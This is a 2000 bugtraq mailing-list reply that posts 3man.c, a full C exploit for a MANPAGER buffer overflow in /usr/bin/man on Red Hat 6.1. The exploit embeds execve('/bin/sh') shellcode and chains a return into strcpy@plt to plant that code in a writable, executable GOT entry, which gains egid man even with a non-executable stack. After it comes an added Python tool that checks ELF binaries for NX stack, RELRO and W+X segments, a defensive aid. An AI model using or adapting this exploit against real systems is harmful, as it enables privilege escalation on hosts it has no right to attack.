List:       bugtraq
Subject:    Re: man-exploit for MANPAGER environment...
From:       Mariusz Woloszyn <emsi () IT ! PL>
Date:       2000-04-26 8:28:46

On Mon, 24 Apr 2000 psychoid@GMX.NET wrote:

> For the sake of full disclosure an exploit for the MANPAGER environment
> variable:
> 
> - snip -
> 
> /*
> * MAN-Exploit for MANPAGER environmental variable.
> * rh 6.x, tested on rh 6.1
> * written by psychoid/tCl
> * gives egid man.
> *
> * Originally discovered by lcamtuf.
> * educational. yes.
> *
> */
> 

For absolutely FULL disclosure here is a wonderful man sploit (already
posted to vuln-dev in thread of sth...) that works cool even if the stack is
nonexecutable (it exploits the feature of GOT being executable -- see
vuln-dev archives for details:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-04-15&msg=Pine.GSO.4.03.10004201510040.12388-100000@zloty.it.com.pl).


GreetZ Bulba, Lam3rZ, teso, hert, Smerda Jajeczny.

Kil3r / Emsi / M.C.Mar /

--
Mariusz Wołoszyn
Internet Security Specialist, Internet Partners, GTS Poland


["3man.c" (TEXT/PLAIN)]

/*
 * Rewritten from:
 * (c) 2000 babcia padlina / b0f
 * (lcamtuf's idea)
 * by Kil3r of Lam3rZ
 * for nonexec stack environment
 *
 * redhat 6.1 (and others) /usr/bin/man exploit
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/stat.h>

/* execve("/bin/sh") shellcode; the "/bin/sh" string sits 38 bytes in (see _BIN_SH) */
char execshell[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define STRCPY		0x80490e4	/* <== strcpy() PLT entry */
#define GOT		0x805038c	/* <== strcpy() GOT entry */
#define NOP		0x90
#define BUFSIZE		(4033+38)
#define RET		STRCPY		/* 0x46464646 */
#define _BIN_SH		0xbfffffe7	/* <== where we have "/bin/sh" string, */
					/*     currently useless ;) */
#define SHELLCODE	0xbfffffc1	/* <== address of execshell in man's environment */

/* Returns the current stack pointer (x86-32 only); unused below, kept from the original. */
long getesp(void)
{
	long esp;
	__asm__("movl %%esp, %0" : "=r"(esp));
	return esp;
}

int main(int argc, char **argv)
{
	/* BUFSIZE NOPs, the 16-byte fake frame that starts 4 bytes before the end, and a NUL */
	char buf[BUFSIZE + 16], *p;
	char *env[3];
	unsigned int *ap;

	memset(buf, NOP, BUFSIZE);

	/*
	 * Fake frame left on man's stack by the overflow:
	 *   saved EIP   -> strcpy@plt
	 *   return addr -> GOT+4   (where strcpy will have just put the shellcode)
	 *   arg 1       -> GOT+4   (strcpy destination: the writable, executable GOT)
	 *   arg 2       -> SHELLCODE (strcpy source: execshell in the environment)
	 * so strcpy(GOT+4, SHELLCODE) runs and then "returns" into the copied code.
	 */
	p = buf + BUFSIZE - 4;
	ap = (unsigned int *)p;
	*ap++ = RET;
	*ap++ = GOT + 4;
	*ap++ = GOT + 4;
	*ap++ = SHELLCODE;
	*(char *)ap = '\0';	/* terminate the environment string right after the frame */

	fprintf(stderr, "RET: 0x%x  SHELLCODE: 0x%x\n", RET, SHELLCODE);

	memcpy(buf, "MANPAGER=", 9);
	env[0] = buf;
/*	env[1] = "/bin/sh"; */
	env[1] = execshell;
	env[2] = (char *)0;
	/* execle() with a fixed environment keeps the shellcode and other params at a fixed address */
	execle("/usr/bin/man", "man", "ls", (char *)0, env);

	return 0;
}

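The trick Mariusz describes (return into strcpy@plt, copy the shellcode over a GOT slot, return into it) only works because the binary's GOT is both writable and executable at the moment of the overflow. The following is an added example, not code from the posting or from the man package: a small ELF program-header and dynamic-section parser that reports the protections which decide whether that technique is still viable against a given binary. The two sample images (`LEGACY`, `HARDENED`) are constructed in the block itself; they are header-only stand-ins, not real executables, and the `build_elf` helper exists only to produce them.

```python
"""Report the ELF protections relevant to the GOT-overwrite technique in this
thread: a non-executable stack (PT_GNU_STACK without PF_X), RELRO (PT_GNU_RELRO,
and with BIND_NOW it also covers .got.plt), and PT_LOAD segments that request
write and execute together.  Little-endian ELF32/ELF64 only."""
import struct

PT_LOAD, PT_DYNAMIC = 1, 2
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 8, 1

# Per EI_CLASS: (ehdr size, phdr size, ehdr tail fmt, phdr fmt, dyn fmt,
#                index of p_flags and p_offset inside an unpacked phdr)
LAYOUT = {
    1: (52, 32, "<HHIIIIIHHHHHH", "<IIIIIIII", "<iI", 6, 1),  # ELF32
    2: (64, 56, "<HHIQQQIHHHHHH", "<IIQQQQQQ", "<qQ", 1, 2),  # ELF64
}


def program_headers(data):
    """Yield (p_type, p_flags, p_offset) for every program header."""
    if data[:4] != b"\x7fELF" or data[5] != 1 or data[4] not in LAYOUT:
        raise ValueError("not a little-endian ELF32/ELF64 image")
    ehsize, _, tail_fmt, ph_fmt, _, fl_idx, off_idx = LAYOUT[data[4]]
    tail = struct.unpack(tail_fmt, data[16:ehsize])
    phoff, phentsize, phnum = tail[4], tail[8], tail[9]
    for i in range(phnum):
        ph = struct.unpack_from(ph_fmt, data, phoff + i * phentsize)
        yield ph[0], ph[fl_idx], ph[off_idx]


def bind_now(data, dyn_offset):
    """True if the dynamic section asks for eager symbol binding, which is what
    lets RELRO make .got.plt read-only before any user input is processed."""
    dyn_fmt = LAYOUT[data[4]][4]
    size, pos = struct.calcsize(dyn_fmt), dyn_offset
    while pos + size <= len(data):
        tag, val = struct.unpack_from(dyn_fmt, data, pos)
        pos += size
        if tag == DT_NULL:
            break
        if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) \
                or (tag == DT_FLAGS_1 and val & DF_1_NOW):
            return True
    return False


def assess(data):
    """Summarise the hardening state of one ELF image as a dict."""
    phdrs = list(program_headers(data))
    stack = [fl for ty, fl, _ in phdrs if ty == PT_GNU_STACK]
    relro = any(ty == PT_GNU_RELRO for ty, _, _ in phdrs)
    dyn = [off for ty, _, off in phdrs if ty == PT_DYNAMIC]
    return {
        # Without PT_GNU_STACK, old kernels simply mapped the stack RWX.
        "nx_stack": bool(stack) and not stack[0] & PF_X,
        # PT_GNU_RELRO alone (partial RELRO) still leaves .got.plt writable,
        # so the strcpy slot targeted above is only covered by full RELRO.
        "partial_relro": relro,
        "full_relro": relro and bool(dyn) and bind_now(data, dyn[0]),
        # Segments that ask for W and X at once: code can be planted in them.
        "wx_load_segments": sum(1 for ty, fl, _ in phdrs
                                if ty == PT_LOAD and fl & PF_W and fl & PF_X),
    }


def build_elf(ei_class, segments, dyn_entries):
    """Assemble a header-only ELF image for testing (constructed, not a real
    binary).  segments: [(p_type, p_flags)]; dyn_entries: [(d_tag, d_val)]."""
    ehsize, phentsize, tail_fmt, ph_fmt, dyn_fmt, _, _ = LAYOUT[ei_class]
    segs = segments + [(PT_DYNAMIC, PF_R | PF_W)]
    dyn_off = ehsize + phentsize * len(segs)
    ident = b"\x7fELF" + bytes([ei_class, 1, 1, 0]) + b"\0" * 8
    hdr = ident + struct.pack(tail_fmt, 2, 3 if ei_class == 1 else 62, 1, 0,
                              ehsize, 0, 0, ehsize, phentsize, len(segs), 0, 0, 0)
    phdrs = b""
    for ty, fl in segs:
        off = dyn_off if ty == PT_DYNAMIC else 0
        if ei_class == 1:   # p_type p_offset p_vaddr p_paddr p_filesz p_memsz p_flags p_align
            phdrs += struct.pack(ph_fmt, ty, off, 0x8048000, 0, 0x1000, 0x1000, fl, 0x1000)
        else:               # p_type p_flags p_offset p_vaddr p_paddr p_filesz p_memsz p_align
            phdrs += struct.pack(ph_fmt, ty, fl, off, 0x400000, 0, 0x1000, 0x1000, 0x1000)
    dyn = b"".join(struct.pack(dyn_fmt, t, v) for t, v in dyn_entries + [(DT_NULL, 0)])
    return hdr + phdrs + dyn


# Constructed stand-ins: an RH 6.1-era style image (RWX data, no PT_GNU_STACK,
# no RELRO) and a modern full-RELRO one.
LEGACY = build_elf(1, [(PT_LOAD, PF_R | PF_X), (PT_LOAD, PF_R | PF_W | PF_X)], [])
HARDENED = build_elf(2, [(PT_LOAD, PF_R | PF_X), (PT_LOAD, PF_R | PF_W),
                         (PT_GNU_RELRO, PF_R), (PT_GNU_STACK, PF_R | PF_W)],
                     [(DT_FLAGS, DF_BIND_NOW)])

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:          # e.g. python3 elfcheck.py /usr/bin/man
        with open(path, "rb") as f:
            print(path, assess(f.read()))
    if len(sys.argv) == 1:
        print("legacy  :", assess(LEGACY))
        print("hardened:", assess(HARDENED))
```

Run without arguments it assesses the two constructed images; given paths it reads real binaries. A binary that reports `full_relro` has its GOT remapped read-only after ld.so finishes, so a strcpy() into GOT+4 faults instead of planting code; with only `partial_relro` the .got.plt slots stay writable and the check above reports that distinction explicitly.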
